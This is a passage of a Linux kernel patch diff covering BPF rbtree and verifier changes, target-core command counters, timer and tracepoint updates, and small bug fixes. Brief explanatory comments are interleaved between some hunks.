+@@ -303,6 +311,10 @@ static inline u32 btf_field_type_size(enum btf_field_type type)
+ 		return sizeof(struct bpf_list_head);
+ 	case BPF_LIST_NODE:
+ 		return sizeof(struct bpf_list_node);
++	case BPF_RB_ROOT:
++		return sizeof(struct bpf_rb_root);
++	case BPF_RB_NODE:
++		return sizeof(struct bpf_rb_node);
+ 	default:
+ 		WARN_ON_ONCE(1);
+ 		return 0;
+@@ -323,6 +335,10 @@ static inline u32 btf_field_type_align(enum btf_field_type type)
+ 		return __alignof__(struct bpf_list_head);
+ 	case BPF_LIST_NODE:
+ 		return __alignof__(struct bpf_list_node);
++	case BPF_RB_ROOT:
++		return __alignof__(struct bpf_rb_root);
++	case BPF_RB_NODE:
++		return __alignof__(struct bpf_rb_node);
+ 	default:
+ 		WARN_ON_ONCE(1);
+ 		return 0;
+@@ -440,6 +456,9 @@ void copy_map_value_locked(struct bpf_map *map, void *dst, void *src,
+ void bpf_timer_cancel_and_free(void *timer);
+ void bpf_list_head_free(const struct btf_field *field, void *list_head,
+ 			struct bpf_spin_lock *spin_lock);
++void bpf_rb_root_free(const struct btf_field *field, void *rb_root,
++		      struct bpf_spin_lock *spin_lock);
++
+ 
+ int bpf_obj_name_cpy(char *dst, const char *src, unsigned int size);
+ 
+@@ -582,6 +601,11 @@ enum bpf_type_flag {
+ 	/* MEM is tagged with rcu and memory access needs rcu_read_lock protection. */
+ 	MEM_RCU			= BIT(13 + BPF_BASE_TYPE_BITS),
+ 
++	/* Used to tag PTR_TO_BTF_ID | MEM_ALLOC references which are non-owning.
++	 * Currently only valid for linked-list and rbtree nodes.
++	 */
++	NON_OWN_REF		= BIT(14 + BPF_BASE_TYPE_BITS),
++
+ 	__BPF_TYPE_FLAG_MAX,
+ 	__BPF_TYPE_LAST_FLAG	= __BPF_TYPE_FLAG_MAX - 1,
+ };
+diff --git a/include/linux/bpf_verifier.h b/include/linux/bpf_verifier.h
+index 53d175cbaa027..ed2f082eabb37 100644
+--- a/include/linux/bpf_verifier.h
++++ b/include/linux/bpf_verifier.h
+@@ -43,6 +43,22 @@ enum bpf_reg_liveness {
+ 	REG_LIVE_DONE = 0x8, /* liveness won't be updating this register anymore */
+ };
+ 
++/* For every reg representing a map value or allocated object pointer,
++ * we consider the tuple of (ptr, id) for them to be unique in verifier
++ * context and consider them to not alias each other for the purposes of
++ * tracking lock state.
++ */
++struct bpf_active_lock {
++	/* This can either be reg->map_ptr or reg->btf. If ptr is NULL,
++	 * there's no active lock held, and other fields have no
++	 * meaning. If non-NULL, it indicates that a lock is held and
++	 * id member has the reg->id of the register which can be >= 0.
++	 */
++	void *ptr;
++	/* This will be reg->id */
++	u32 id;
++};
++
+ struct bpf_reg_state {
+ 	/* Ordering of fields matters.  See states_equal() */
+ 	enum bpf_reg_type type;
+@@ -223,11 +239,6 @@ struct bpf_reference_state {
+ 	 * exiting a callback function.
+ 	 */
+ 	int callback_ref;
+-	/* Mark the reference state to release the registers sharing the same id
+-	 * on bpf_spin_unlock (for nodes that we will lose ownership to but are
+-	 * safe to access inside the critical section).
+-	 */
+-	bool release_on_unlock;
+ };
+ 
+ /* state of the program:
+@@ -328,21 +339,8 @@ struct bpf_verifier_state {
+ 	u32 branches;
+ 	u32 insn_idx;
+ 	u32 curframe;
+-	/* For every reg representing a map value or allocated object pointer,
+-	 * we consider the tuple of (ptr, id) for them to be unique in verifier
+-	 * context and conside them to not alias each other for the purposes of
+-	 * tracking lock state.
+-	 */
+-	struct {
+-		/* This can either be reg->map_ptr or reg->btf. If ptr is NULL,
+-		 * there's no active lock held, and other fields have no
+-		 * meaning. If non-NULL, it indicates that a lock is held and
+-		 * id member has the reg->id of the register which can be >= 0.
+-		 */
+-		void *ptr;
+-		/* This will be reg->id */
+-		u32 id;
+-	} active_lock;
++
++	struct bpf_active_lock active_lock;
+ 	bool speculative;
+ 	bool active_rcu_lock;
+ 
+diff --git a/include/linux/btf.h b/include/linux/btf.h
+index 5f628f323442a..ff62fa63dc197 100644
+--- a/include/linux/btf.h
++++ b/include/linux/btf.h
+@@ -72,6 +72,14 @@
+ #define KF_DESTRUCTIVE  (1 << 6) /* kfunc performs destructive actions */
+ #define KF_RCU          (1 << 7) /* kfunc only takes rcu pointer arguments */
+ 
++/*
++ * Tag marking a kernel function as a kfunc. This is meant to minimize the
++ * amount of copy-paste that kfunc authors have to include for correctness so
++ * as to avoid issues such as the compiler inlining or eliding either a static
++ * kfunc, or a global kfunc in an LTO build.
++ */
++#define __bpf_kfunc __used noinline
++
+ /*
+  * Return the name of the passed struct, if exists, or halt the build if for
+  * example the structure gets renamed. In this way, developers have to revisit
+diff --git a/include/linux/filter.h b/include/linux/filter.h
+index ccc4a4a58c727..b08ba0a643f8c 100644
+--- a/include/linux/filter.h
++++ b/include/linux/filter.h
+@@ -1503,9 +1503,9 @@ static inline bool bpf_sk_lookup_run_v6(struct net *net, int protocol,
+ }
+ #endif /* IS_ENABLED(CONFIG_IPV6) */
+ 
+-static __always_inline int __bpf_xdp_redirect_map(struct bpf_map *map, u64 index,
+-						  u64 flags, const u64 flag_mask,
+-						  void *lookup_elem(struct bpf_map *map, u32 key))
++static __always_inline long __bpf_xdp_redirect_map(struct bpf_map *map, u64 index,
++						   u64 flags, const u64 flag_mask,
++						   void *lookup_elem(struct bpf_map *map, u32 key))
+ {
+ 	struct bpf_redirect_info *ri = this_cpu_ptr(&bpf_redirect_info);
+ 	const u64 action_mask = XDP_ABORTED | XDP_DROP | XDP_PASS | XDP_TX;
+diff --git a/include/linux/mailbox/zynqmp-ipi-message.h b/include/linux/mailbox/zynqmp-ipi-message.h
+index 35ce84c8ca02c..31d8046d945e7 100644
+--- a/include/linux/mailbox/zynqmp-ipi-message.h
++++ b/include/linux/mailbox/zynqmp-ipi-message.h
+@@ -9,7 +9,7 @@
+  * @data: message payload
+  *
+  * This is the structure for data used in mbox_send_message
+- * the maximum length of data buffer is fixed to 12 bytes.
++ * the maximum length of the data buffer is fixed to 32 bytes.
+  * Client is supposed to be aware of this.
+  */
+ struct zynqmp_ipi_message {
+diff --git a/include/linux/mlx5/mlx5_ifc.h b/include/linux/mlx5/mlx5_ifc.h
+index a9ee7bc59c901..90ab0e31ecf46 100644
+--- a/include/linux/mlx5/mlx5_ifc.h
++++ b/include/linux/mlx5/mlx5_ifc.h
+@@ -9144,7 +9144,8 @@ struct mlx5_ifc_alloc_flow_counter_in_bits {
+ 	u8         reserved_at_20[0x10];
+ 	u8         op_mod[0x10];
+ 
+-	u8         reserved_at_40[0x38];
++	u8         reserved_at_40[0x33];
++	u8         flow_counter_bulk_log_size[0x5];
+ 	u8         flow_counter_bulk[0x8];
+ };
+ 
+diff --git a/include/linux/netfilter/nfnetlink.h b/include/linux/netfilter/nfnetlink.h
+index 241e005f290ad..e9a9ab34a7ccc 100644
+--- a/include/linux/netfilter/nfnetlink.h
++++ b/include/linux/netfilter/nfnetlink.h
+@@ -45,7 +45,6 @@ struct nfnetlink_subsystem {
+ 	int (*commit)(struct net *net, struct sk_buff *skb);
+ 	int (*abort)(struct net *net, struct sk_buff *skb,
+ 		     enum nfnl_abort_action action);
+-	void (*cleanup)(struct net *net);
+ 	bool (*valid_genid)(struct net *net, u32 genid);
+ };
+ 
+diff --git a/include/linux/platform_device.h b/include/linux/platform_device.h
+index b0d5a253156ec..b845fd83f429b 100644
+--- a/include/linux/platform_device.h
++++ b/include/linux/platform_device.h
+@@ -207,7 +207,18 @@ extern void platform_device_put(struct platform_device *pdev);
+ 
+ struct platform_driver {
+ 	int (*probe)(struct platform_device *);
++
++	/*
++	 * Traditionally the remove callback returned an int which however is
++	 * ignored by the driver core. This led to wrong expectations by driver
++	 * authors who thought returning an error code was a valid error
++	 * handling strategy. To convert to a callback returning void, new
++	 * drivers should implement .remove_new() until the conversion is done
++	 * that eventually makes .remove() return void.
++	 */
+ 	int (*remove)(struct platform_device *);
++	void (*remove_new)(struct platform_device *);
++
+ 	void (*shutdown)(struct platform_device *);
+ 	int (*suspend)(struct platform_device *, pm_message_t state);
+ 	int (*resume)(struct platform_device *);
+diff --git a/include/linux/posix-timers.h b/include/linux/posix-timers.h
+index 2c6e99ca48afc..d607f51404fca 100644
+--- a/include/linux/posix-timers.h
++++ b/include/linux/posix-timers.h
+@@ -4,6 +4,7 @@
+ 
+ #include <linux/spinlock.h>
+ #include <linux/list.h>
++#include <linux/mutex.h>
+ #include <linux/alarmtimer.h>
+ #include <linux/timerqueue.h>
+ 
+@@ -62,16 +63,18 @@ static inline int clockid_to_fd(const clockid_t clk)
+  * cpu_timer - Posix CPU timer representation for k_itimer
+  * @node:	timerqueue node to queue in the task/sig
+  * @head:	timerqueue head on which this timer is queued
+- * @task:	Pointer to target task
++ * @pid:	Pointer to target task PID
+  * @elist:	List head for the expiry list
+  * @firing:	Timer is currently firing
++ * @handling:	Pointer to the task which handles expiry
+  */
+ struct cpu_timer {
+-	struct timerqueue_node	node;
+-	struct timerqueue_head	*head;
+-	struct pid		*pid;
+-	struct list_head	elist;
+-	int			firing;
++	struct timerqueue_node		node;
++	struct timerqueue_head		*head;
++	struct pid			*pid;
++	struct list_head		elist;
++	int				firing;
++	struct task_struct __rcu	*handling;
+ };
+ 
+ static inline bool cpu_timer_enqueue(struct timerqueue_head *head,
+@@ -135,10 +138,12 @@ struct posix_cputimers {
+ /**
+  * posix_cputimers_work - Container for task work based posix CPU timer expiry
+  * @work:	The task work to be scheduled
++ * @mutex:	Mutex held around expiry in context of this task work
+  * @scheduled:  @work has been scheduled already, no further processing
+  */
+ struct posix_cputimers_work {
+ 	struct callback_head	work;
++	struct mutex		mutex;
+ 	unsigned int		scheduled;
+ };
+ 
+diff --git a/include/linux/sunrpc/sched.h b/include/linux/sunrpc/sched.h
+index b8ca3ecaf8d76..8ada7dc802d30 100644
+--- a/include/linux/sunrpc/sched.h
++++ b/include/linux/sunrpc/sched.h
+@@ -90,8 +90,7 @@ struct rpc_task {
+ #endif
+ 	unsigned char		tk_priority : 2,/* Task priority */
+ 				tk_garb_retry : 2,
+-				tk_cred_retry : 2,
+-				tk_rebind_retry : 2;
++				tk_cred_retry : 2;
+ };
+ 
+ typedef void			(*rpc_action)(struct rpc_task *);
+diff --git a/include/linux/tick.h b/include/linux/tick.h
+index bfd571f18cfdc..9459fef5b8573 100644
+--- a/include/linux/tick.h
++++ b/include/linux/tick.h
+@@ -216,6 +216,7 @@ extern void tick_nohz_dep_set_signal(struct task_struct *tsk,
+ 				     enum tick_dep_bits bit);
+ extern void tick_nohz_dep_clear_signal(struct signal_struct *signal,
+ 				       enum tick_dep_bits bit);
++extern bool tick_nohz_cpu_hotpluggable(unsigned int cpu);
+ 
+ /*
+  * The below are tick_nohz_[set,clear]_dep() wrappers that optimize off-cases
+@@ -280,6 +281,7 @@ static inline void tick_nohz_full_add_cpus_to(struct cpumask *mask) { }
+ 
+ static inline void tick_nohz_dep_set_cpu(int cpu, enum tick_dep_bits bit) { }
+ static inline void tick_nohz_dep_clear_cpu(int cpu, enum tick_dep_bits bit) { }
++static inline bool tick_nohz_cpu_hotpluggable(unsigned int cpu) { return true; }
+ 
+ static inline void tick_dep_set(enum tick_dep_bits bit) { }
+ static inline void tick_dep_clear(enum tick_dep_bits bit) { }
+diff --git a/include/linux/vt_buffer.h b/include/linux/vt_buffer.h
+index 848db1b1569ff..919d999a8c1db 100644
+--- a/include/linux/vt_buffer.h
++++ b/include/linux/vt_buffer.h
+@@ -16,7 +16,7 @@
+ 
+ #include <linux/string.h>
+ 
+-#if defined(CONFIG_VGA_CONSOLE) || defined(CONFIG_MDA_CONSOLE)
++#if IS_ENABLED(CONFIG_VGA_CONSOLE) || IS_ENABLED(CONFIG_MDA_CONSOLE)
+ #include <asm/vga.h>
+ #endif
+ 
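The switch to IS_ENABLED() matters for tristate options: with CONFIG_MDA_CONSOLE=m the preprocessor defines CONFIG_MDA_CONSOLE_MODULE rather than CONFIG_MDA_CONSOLE, so the old defined() check skipped <asm/vga.h> for modular builds. In short:

  #if defined(CONFIG_MDA_CONSOLE)     /* true only for =y */
  #if IS_ENABLED(CONFIG_MDA_CONSOLE)  /* true for =y and =m */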
+diff --git a/include/net/netfilter/nf_conntrack_core.h b/include/net/netfilter/nf_conntrack_core.h
+index 71d1269fe4d4f..3384859a89210 100644
+--- a/include/net/netfilter/nf_conntrack_core.h
++++ b/include/net/netfilter/nf_conntrack_core.h
+@@ -89,7 +89,11 @@ static inline void __nf_ct_set_timeout(struct nf_conn *ct, u64 timeout)
+ {
+ 	if (timeout > INT_MAX)
+ 		timeout = INT_MAX;
+-	WRITE_ONCE(ct->timeout, nfct_time_stamp + (u32)timeout);
++
++	if (nf_ct_is_confirmed(ct))
++		WRITE_ONCE(ct->timeout, nfct_time_stamp + (u32)timeout);
++	else
++		ct->timeout = (u32)timeout;
+ }
+ 
+ int __nf_ct_change_timeout(struct nf_conn *ct, u64 cta_timeout);
+diff --git a/include/net/netfilter/nf_tables.h b/include/net/netfilter/nf_tables.h
+index 1b8e305bb54ae..9dace9bcba8e5 100644
+--- a/include/net/netfilter/nf_tables.h
++++ b/include/net/netfilter/nf_tables.h
+@@ -619,6 +619,7 @@ struct nft_set_binding {
+ };
+ 
+ enum nft_trans_phase;
++void nf_tables_activate_set(const struct nft_ctx *ctx, struct nft_set *set);
+ void nf_tables_deactivate_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 			      struct nft_set_binding *binding,
+ 			      enum nft_trans_phase phase);
+diff --git a/include/net/scm.h b/include/net/scm.h
+index 1ce365f4c2560..585adc1346bd0 100644
+--- a/include/net/scm.h
++++ b/include/net/scm.h
+@@ -105,16 +105,27 @@ static inline void scm_passec(struct socket *sock, struct msghdr *msg, struct sc
+ 		}
+ 	}
+ }
++
++static inline bool scm_has_secdata(struct socket *sock)
++{
++	return test_bit(SOCK_PASSSEC, &sock->flags);
++}
+ #else
+ static inline void scm_passec(struct socket *sock, struct msghdr *msg, struct scm_cookie *scm)
+ { }
++
++static inline bool scm_has_secdata(struct socket *sock)
++{
++	return false;
++}
+ #endif /* CONFIG_SECURITY_NETWORK */
+ 
+ static __inline__ void scm_recv(struct socket *sock, struct msghdr *msg,
+ 				struct scm_cookie *scm, int flags)
+ {
+ 	if (!msg->msg_control) {
+-		if (test_bit(SOCK_PASSCRED, &sock->flags) || scm->fp)
++		if (test_bit(SOCK_PASSCRED, &sock->flags) || scm->fp ||
++		    scm_has_secdata(sock))
+ 			msg->msg_flags |= MSG_CTRUNC;
+ 		scm_destroy(scm);
+ 		return;
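The change is observable from userspace: a receiver that supplies no control buffer now gets MSG_CTRUNC when security ancillary data (SCM_SECURITY, enabled via SO_PASSSEC) had to be dropped, matching the existing behaviour for credentials and passed file descriptors. A hedged sketch of the userspace side, assuming fd is a connected AF_UNIX socket with SO_PASSSEC set:

  #include <sys/socket.h>

  static int secdata_was_dropped(int fd)
  {
          char buf[128];
          struct iovec iov = { .iov_base = buf, .iov_len = sizeof(buf) };
          struct msghdr msg = { .msg_iov = &iov, .msg_iovlen = 1 };

          /* msg_control is NULL, so ancillary data cannot be delivered */
          if (recvmsg(fd, &msg, 0) < 0)
                  return -1;
          return !!(msg.msg_flags & MSG_CTRUNC);
  }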
+diff --git a/include/net/xsk_buff_pool.h b/include/net/xsk_buff_pool.h
+index f787c3f524b03..996eaf1ef1a1d 100644
+--- a/include/net/xsk_buff_pool.h
++++ b/include/net/xsk_buff_pool.h
+@@ -175,13 +175,8 @@ static inline bool xp_desc_crosses_non_contig_pg(struct xsk_buff_pool *pool,
+ 	if (likely(!cross_pg))
+ 		return false;
+ 
+-	if (pool->dma_pages_cnt) {
+-		return !(pool->dma_pages[addr >> PAGE_SHIFT] &
+-			 XSK_NEXT_PG_CONTIG_MASK);
+-	}
+-
+-	/* skb path */
+-	return addr + len > pool->addrs_cnt;
++	return pool->dma_pages_cnt &&
++	       !(pool->dma_pages[addr >> PAGE_SHIFT] & XSK_NEXT_PG_CONTIG_MASK);
+ }
+ 
+ static inline u64 xp_aligned_extract_addr(struct xsk_buff_pool *pool, u64 addr)
+diff --git a/include/target/iscsi/iscsi_target_core.h b/include/target/iscsi/iscsi_target_core.h
+index 94d06ddfd80ad..229118156a1f6 100644
+--- a/include/target/iscsi/iscsi_target_core.h
++++ b/include/target/iscsi/iscsi_target_core.h
+@@ -600,6 +600,7 @@ struct iscsit_conn {
+ 	struct iscsi_tpg_np	*tpg_np;
+ 	/* Pointer to parent session */
+ 	struct iscsit_session	*sess;
++	struct target_cmd_counter *cmd_cnt;
+ 	int			bitmap_id;
+ 	int			rx_thread_active;
+ 	struct task_struct	*rx_thread;
+diff --git a/include/target/target_core_base.h b/include/target/target_core_base.h
+index 12c9ba16217ef..8cc42ad65c925 100644
+--- a/include/target/target_core_base.h
++++ b/include/target/target_core_base.h
+@@ -494,6 +494,7 @@ struct se_cmd {
+ 	struct se_lun		*se_lun;
+ 	/* Only used for internal passthrough and legacy TCM fabric modules */
+ 	struct se_session	*se_sess;
++	struct target_cmd_counter *cmd_cnt;
+ 	struct se_tmr_req	*se_tmr_req;
+ 	struct llist_node	se_cmd_list;
+ 	struct completion	*free_compl;
+@@ -619,22 +620,26 @@ static inline struct se_node_acl *fabric_stat_to_nacl(struct config_item *item)
+ 			acl_fabric_stat_group);
+ }
+ 
+-struct se_session {
++struct target_cmd_counter {
++	struct percpu_ref	refcnt;
++	wait_queue_head_t	refcnt_wq;
++	struct completion	stop_done;
+ 	atomic_t		stopped;
++};
++
++struct se_session {
+ 	u64			sess_bin_isid;
+ 	enum target_prot_op	sup_prot_ops;
+ 	enum target_prot_type	sess_prot_type;
+ 	struct se_node_acl	*se_node_acl;
+ 	struct se_portal_group *se_tpg;
+ 	void			*fabric_sess_ptr;
+-	struct percpu_ref	cmd_count;
+ 	struct list_head	sess_list;
+ 	struct list_head	sess_acl_list;
+ 	spinlock_t		sess_cmd_lock;
+-	wait_queue_head_t	cmd_count_wq;
+-	struct completion	stop_done;
+ 	void			*sess_cmd_map;
+ 	struct sbitmap_queue	sess_tag_pool;
++	struct target_cmd_counter *cmd_cnt;
+ };
+ 
+ struct se_device;
+@@ -867,6 +872,7 @@ struct se_device {
+ 	struct rcu_head		rcu_head;
+ 	int			queue_cnt;
+ 	struct se_device_queue	*queues;
++	struct mutex		lun_reset_mutex;
+ };
+ 
+ struct target_opcode_descriptor {
+diff --git a/include/target/target_core_fabric.h b/include/target/target_core_fabric.h
+index 38f0662476d14..b188b1e90e1ed 100644
+--- a/include/target/target_core_fabric.h
++++ b/include/target/target_core_fabric.h
+@@ -133,7 +133,12 @@ struct se_session *target_setup_session(struct se_portal_group *,
+ 				struct se_session *, void *));
+ void target_remove_session(struct se_session *);
+ 
+-int transport_init_session(struct se_session *se_sess);
++void target_stop_cmd_counter(struct target_cmd_counter *cmd_cnt);
++void target_wait_for_cmds(struct target_cmd_counter *cmd_cnt);
++struct target_cmd_counter *target_alloc_cmd_counter(void);
++void target_free_cmd_counter(struct target_cmd_counter *cmd_cnt);
++
++void transport_init_session(struct se_session *se_sess);
+ struct se_session *transport_alloc_session(enum target_prot_op);
+ int transport_alloc_session_tags(struct se_session *, unsigned int,
+ 		unsigned int);
+@@ -149,9 +154,11 @@ void	transport_deregister_session_configfs(struct se_session *);
+ void	transport_deregister_session(struct se_session *);
+ 
+ 
+-void	__target_init_cmd(struct se_cmd *,
+-		const struct target_core_fabric_ops *,
+-		struct se_session *, u32, int, int, unsigned char *, u64);
++void	__target_init_cmd(struct se_cmd *cmd,
++		const struct target_core_fabric_ops *tfo,
++		struct se_session *sess, u32 data_length, int data_direction,
++		int task_attr, unsigned char *sense_buffer, u64 unpacked_lun,
++		struct target_cmd_counter *cmd_cnt);
+ int	target_init_cmd(struct se_cmd *se_cmd, struct se_session *se_sess,
+ 		unsigned char *sense, u64 unpacked_lun, u32 data_length,
+ 		int task_attr, int data_dir, int flags);
+diff --git a/include/trace/events/qrtr.h b/include/trace/events/qrtr.h
+index b1de14c3bb934..441132c67133f 100644
+--- a/include/trace/events/qrtr.h
++++ b/include/trace/events/qrtr.h
+@@ -10,15 +10,16 @@
+ 
+ TRACE_EVENT(qrtr_ns_service_announce_new,
+ 
+-	TP_PROTO(__le32 service, __le32 instance, __le32 node, __le32 port),
++	TP_PROTO(unsigned int service, unsigned int instance,
++		 unsigned int node, unsigned int port),
+ 
+ 	TP_ARGS(service, instance, node, port),
+ 
+ 	TP_STRUCT__entry(
+-		__field(__le32, service)
+-		__field(__le32, instance)
+-		__field(__le32, node)
+-		__field(__le32, port)
++		__field(unsigned int, service)
++		__field(unsigned int, instance)
++		__field(unsigned int, node)
++		__field(unsigned int, port)
+ 	),
+ 
+ 	TP_fast_assign(
+@@ -36,15 +37,16 @@ TRACE_EVENT(qrtr_ns_service_announce_new,
+ 
+ TRACE_EVENT(qrtr_ns_service_announce_del,
+ 
+-	TP_PROTO(__le32 service, __le32 instance, __le32 node, __le32 port),
++	TP_PROTO(unsigned int service, unsigned int instance,
++		 unsigned int node, unsigned int port),
+ 
+ 	TP_ARGS(service, instance, node, port),
+ 
+ 	TP_STRUCT__entry(
+-		__field(__le32, service)
+-		__field(__le32, instance)
+-		__field(__le32, node)
+-		__field(__le32, port)
++		__field(unsigned int, service)
++		__field(unsigned int, instance)
++		__field(unsigned int, node)
++		__field(unsigned int, port)
+ 	),
+ 
+ 	TP_fast_assign(
+@@ -62,15 +64,16 @@ TRACE_EVENT(qrtr_ns_service_announce_del,
+ 
+ TRACE_EVENT(qrtr_ns_server_add,
+ 
+-	TP_PROTO(__le32 service, __le32 instance, __le32 node, __le32 port),
++	TP_PROTO(unsigned int service, unsigned int instance,
++		 unsigned int node, unsigned int port),
+ 
+ 	TP_ARGS(service, instance, node, port),
+ 
+ 	TP_STRUCT__entry(
+-		__field(__le32, service)
+-		__field(__le32, instance)
+-		__field(__le32, node)
+-		__field(__le32, port)
++		__field(unsigned int, service)
++		__field(unsigned int, instance)
++		__field(unsigned int, node)
++		__field(unsigned int, port)
+ 	),
+ 
+ 	TP_fast_assign(
+diff --git a/include/trace/events/timer.h b/include/trace/events/timer.h
+index 2e713a7d9aa3a..3e8619c72f774 100644
+--- a/include/trace/events/timer.h
++++ b/include/trace/events/timer.h
+@@ -371,7 +371,8 @@ TRACE_EVENT(itimer_expire,
+ 		tick_dep_name(PERF_EVENTS)		\
+ 		tick_dep_name(SCHED)			\
+ 		tick_dep_name(CLOCK_UNSTABLE)		\
+-		tick_dep_name_end(RCU)
++		tick_dep_name(RCU)			\
++		tick_dep_name_end(RCU_EXP)
+ 
+ #undef tick_dep_name
+ #undef tick_dep_mask_name
+diff --git a/include/trace/stages/stage5_get_offsets.h b/include/trace/stages/stage5_get_offsets.h
+index ac5c24d3beeb2..e30a13be46ba5 100644
+--- a/include/trace/stages/stage5_get_offsets.h
++++ b/include/trace/stages/stage5_get_offsets.h
+@@ -9,17 +9,30 @@
+ #undef __entry
+ #define __entry entry
+ 
++/*
++ * Fields should never declare an array, e.g. __field(int, arr[5]).
++ * If they do, it will cause issues in parsing and possibly corrupt the
++ * events. To prevent that from happening, take the sizeof() of a fictitious
++ * type called "struct _test_no_array_##item" which will fail if "item"
++ * contains array elements (like "arr[5]").
++ *
++ * If you hit this, use __array(int, arr, 5) instead.
++ */
+ #undef __field
+-#define __field(type, item)
++#define __field(type, item)					\
++	{ (void)sizeof(struct _test_no_array_##item *); }
+ 
+ #undef __field_ext
+-#define __field_ext(type, item, filter_type)
++#define __field_ext(type, item, filter_type)			\
++	{ (void)sizeof(struct _test_no_array_##item *); }
+ 
+ #undef __field_struct
+-#define __field_struct(type, item)
++#define __field_struct(type, item)				\
++	{ (void)sizeof(struct _test_no_array_##item *); }
+ 
+ #undef __field_struct_ext
+-#define __field_struct_ext(type, item, filter_type)
++#define __field_struct_ext(type, item, filter_type)		\
++	{ (void)sizeof(struct _test_no_array_##item *); }
+ 
+ #undef __array
+ #define __array(type, item, len)
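Concretely, a misdeclared field such as __field(int, arr[5]) now pastes into

  { (void)sizeof(struct _test_no_array_arr[5] *); }

which fails to parse, turning the mistake into a build error rather than corrupted event parsing; __array(int, arr, 5) is unaffected because __array() keeps its empty definition in this stage.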
+diff --git a/include/uapi/linux/bpf.h b/include/uapi/linux/bpf.h
+index 464ca3f01fe7a..bd260134c4201 100644
+--- a/include/uapi/linux/bpf.h
++++ b/include/uapi/linux/bpf.h
+@@ -6901,6 +6901,17 @@ struct bpf_list_node {
+ 	__u64 :64;
+ } __attribute__((aligned(8)));
+ 
++struct bpf_rb_root {
++	__u64 :64;
++	__u64 :64;
++} __attribute__((aligned(8)));
++
++struct bpf_rb_node {
++	__u64 :64;
++	__u64 :64;
++	__u64 :64;
++} __attribute__((aligned(8)));
++
+ struct bpf_sysctl {
+ 	__u32	write;		/* Sysctl is being read (= 0) or written (= 1).
+ 				 * Allows 1,2,4-byte read, but no write.
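Like bpf_list_head/bpf_list_node, these are opaque placeholders sized to cover the kernel-internal rb_root_cached and rb_node. On the program side they get embedded in user-defined types; the sketch below follows the "contains:" decl_tag convention the kernel BTF parser looks for (node_data and the __contains wrapper are illustrative, mirroring the kernel selftests rather than anything defined in this header):

  struct node_data {
          long key;
          struct bpf_rb_node node;
  };

  #define __contains(name, node) \
          __attribute__((btf_decl_tag("contains:" #name ":" #node)))

  struct bpf_spin_lock glock;
  struct bpf_rb_root groot __contains(node_data, node);

A bpf_rb_root must be accompanied by a bpf_spin_lock in the same map value or allocation; the BTF checks added later in this patch enforce that.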
+diff --git a/include/uapi/linux/btrfs.h b/include/uapi/linux/btrfs.h
+index b4f0f9531119f..5864d2d9b79a3 100644
+--- a/include/uapi/linux/btrfs.h
++++ b/include/uapi/linux/btrfs.h
+@@ -187,6 +187,7 @@ struct btrfs_scrub_progress {
+ };
+ 
+ #define BTRFS_SCRUB_READONLY	1
++#define BTRFS_SCRUB_SUPPORTED_FLAGS	(BTRFS_SCRUB_READONLY)
+ struct btrfs_ioctl_scrub_args {
+ 	__u64 devid;				/* in */
+ 	__u64 start;				/* in */
+diff --git a/include/uapi/linux/const.h b/include/uapi/linux/const.h
+index af2a44c08683d..a429381e7ca50 100644
+--- a/include/uapi/linux/const.h
++++ b/include/uapi/linux/const.h
+@@ -28,7 +28,7 @@
+ #define _BITUL(x)	(_UL(1) << (x))
+ #define _BITULL(x)	(_ULL(1) << (x))
+ 
+-#define __ALIGN_KERNEL(x, a)		__ALIGN_KERNEL_MASK(x, (typeof(x))(a) - 1)
++#define __ALIGN_KERNEL(x, a)		__ALIGN_KERNEL_MASK(x, (__typeof__(x))(a) - 1)
+ #define __ALIGN_KERNEL_MASK(x, mask)	(((x) + (mask)) & ~(mask))
+ 
+ #define __KERNEL_DIV_ROUND_UP(n, d) (((n) + (d) - 1) / (d))
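typeof is a GNU extension keyword that is unavailable when userspace compiles this uapi header in a strict ISO C mode (e.g. -std=c99 without GNU extensions), whereas __typeof__ is always accepted by gcc and clang; the arithmetic itself is unchanged. For example:

  /* __ALIGN_KERNEL(1000, 64) == ((1000 + 63) & ~63) == 1024 */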
+diff --git a/include/xen/xen.h b/include/xen/xen.h
+index 7adf59837c258..0efeb652f9b8f 100644
+--- a/include/xen/xen.h
++++ b/include/xen/xen.h
+@@ -71,4 +71,15 @@ static inline void xen_free_unpopulated_pages(unsigned int nr_pages,
+ }
+ #endif
+ 
++#if defined(CONFIG_XEN_DOM0) && defined(CONFIG_ACPI) && defined(CONFIG_X86)
++bool __init xen_processor_present(uint32_t acpi_id);
++#else
++#include <linux/bug.h>
++static inline bool xen_processor_present(uint32_t acpi_id)
++{
++	BUG();
++	return false;
++}
++#endif
++
+ #endif	/* _XEN_XEN_H */
+diff --git a/io_uring/rsrc.c b/io_uring/rsrc.c
+index 4ccfc29216269..e100f040371b5 100644
+--- a/io_uring/rsrc.c
++++ b/io_uring/rsrc.c
+@@ -577,7 +577,7 @@ static int __io_sqe_buffers_update(struct io_ring_ctx *ctx,
+ 		}
+ 
+ 		ctx->user_bufs[i] = imu;
+-		*io_get_tag_slot(ctx->buf_data, offset) = tag;
++		*io_get_tag_slot(ctx->buf_data, i) = tag;
+ 	}
+ 
+ 	if (needs_switch)
+diff --git a/kernel/bpf/arraymap.c b/kernel/bpf/arraymap.c
+index 4847069595569..cb80bcc880b44 100644
+--- a/kernel/bpf/arraymap.c
++++ b/kernel/bpf/arraymap.c
+@@ -307,8 +307,8 @@ static int array_map_get_next_key(struct bpf_map *map, void *key, void *next_key
+ }
+ 
+ /* Called from syscall or from eBPF program */
+-static int array_map_update_elem(struct bpf_map *map, void *key, void *value,
+-				 u64 map_flags)
++static long array_map_update_elem(struct bpf_map *map, void *key, void *value,
++				  u64 map_flags)
+ {
+ 	struct bpf_array *array = container_of(map, struct bpf_array, map);
+ 	u32 index = *(u32 *)key;
+@@ -386,7 +386,7 @@ int bpf_percpu_array_update(struct bpf_map *map, void *key, void *value,
+ }
+ 
+ /* Called from syscall or from eBPF program */
+-static int array_map_delete_elem(struct bpf_map *map, void *key)
++static long array_map_delete_elem(struct bpf_map *map, void *key)
+ {
+ 	return -EINVAL;
+ }
+@@ -686,8 +686,8 @@ static const struct bpf_iter_seq_info iter_seq_info = {
+ 	.seq_priv_size		= sizeof(struct bpf_iter_seq_array_map_info),
+ };
+ 
+-static int bpf_for_each_array_elem(struct bpf_map *map, bpf_callback_t callback_fn,
+-				   void *callback_ctx, u64 flags)
++static long bpf_for_each_array_elem(struct bpf_map *map, bpf_callback_t callback_fn,
++				    void *callback_ctx, u64 flags)
+ {
+ 	u32 i, key, num_elems = 0;
+ 	struct bpf_array *array;
+@@ -847,7 +847,7 @@ int bpf_fd_array_map_update_elem(struct bpf_map *map, struct file *map_file,
+ 	return 0;
